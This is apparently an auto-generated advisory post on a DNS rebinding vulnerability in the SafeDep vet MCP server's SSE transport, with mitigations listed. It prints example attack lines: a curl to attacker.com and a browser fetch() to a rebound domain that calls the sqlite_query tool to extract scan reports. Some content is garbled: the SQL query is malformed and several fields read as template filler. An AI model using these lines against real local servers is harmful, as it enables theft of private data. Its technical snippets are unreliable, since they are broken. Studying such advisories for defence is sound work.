Listen to this Post
How the CVE-2024-45703 Works
The vulnerability is a classic DNS rebinding attack against the SafeDep vet MCP server when configured to use Server-Sent Events (SSE) transport. The attack exploits the lack of validation for the HTTP `Host` and `Origin` headers. An attacker registers a domain name and configures it with a very short Time-To-Live (TTL). They then lure a victim to their malicious website. When the victim’s browser loads the site, the attacker’s domain resolves to the malicious server. The site runs a script that makes a request to the vet SSE server. After the initial response, the attacker rebinds their domain’s DNS record to resolve to 127.0.0.1. The victim’s browser, now trusting the domain due to the same-origin policy, sends subsequent requests which are directed to the localhost vet server. Since the vet server does not validate the `Host` or `Origin` headers, it accepts these cross-origin requests. The attacker can then use the MCP server’s sqlite3 query tool to exfiltrate sensitive scan report data from the local database.
Platform: SafeDep vet
Version: < v1.12.5
Vulnerability: DNS Rebinding
Severity: Critical
date: 2024
Prediction: Patched in v1.12.5
What Undercode Say:
Analytics
`nslookup -type=A attacker.com`
`curl -H “Host: localhost:8080” http://attacker.com/mcp`
`fetch(‘http://rebound-domain/mcp/tools/sqlite_query’, {method: ‘POST’, body: JSON.stringify({query: ‘SELECT FROM reports;’})})`
How Exploit:
Malicious website script.
DNS rebinding to 127.0.0.1.
Bypasses origin checks.
Uses MCP sqlite3 tool.
Exfiltrates database contents.
Protection from this CVE
Update to v1.12.5.
Validate Host header.
Use stdio transport.
Restrict server access.
Impact:
Unauthorized data access.
Scan report exfiltration.
Information disclosure.
Loss of confidentiality.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
